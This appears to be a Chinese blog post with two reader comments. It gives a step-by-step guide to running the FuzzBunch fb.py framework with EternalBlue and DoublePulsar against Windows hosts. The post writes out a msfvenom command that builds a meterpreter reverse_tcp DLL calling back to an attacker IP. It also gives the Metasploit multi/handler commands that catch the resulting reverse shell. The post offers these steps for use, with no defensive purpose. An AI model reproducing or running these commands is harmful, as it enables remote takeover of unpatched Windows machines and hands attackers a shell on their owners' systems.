windows溢出0day利用方法

拿到exp,测了下
所需环境如下:一,攻击机1(32位系统,py2.6版本,pywin32) 二,攻击机2(linux带msf就好)
windows目录下新建listeningposts目录,空的就好(是exp下的windows目录,不是C盘下的windows目录)
不需要注释文件
执行python fb.py
可看到如下页面
1.png
设置攻击IP,如192.168.1.24
设置监听IP,
切记,这里是no,红框位置
2.png
接着use eternalblue,一直回车即可,一直到这里,红框位置,根据自己的环境选择,我这边两个都选的1
3.png
接着回车,可以看到如下页面
4.png
use Doublepulsar,回车注意红框位置,第二个红框,这里选择2,接着输入恶意dll的路径,
5.png
恶意dll的生成命令如下,在linux中生成,linux需要装好msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > test.dll
IP,端口,输出的名字自己改并把dll文件移植到攻击机1中(顺序有点放反了,不过没事)
如图所示
6.png
接着,攻击机1就暂时别动了,去攻击机2,打开msf,命令如下: msfconsole use exploit/multi/handler set LHOST set LPORT exploit, 设置好IP,端口接着开始监听,继续回到攻击机1,回车就好了,可以看到如下页面,就是攻击成功了,返回攻击机2,可以看到已经反弹了shell
7.png
8.png

标签: none

已有 2 条评论

  1. 小云云 小云云

    不错,这么搞的确了~

  2. 看不懂,但感觉好厉害的样子啊

添加新评论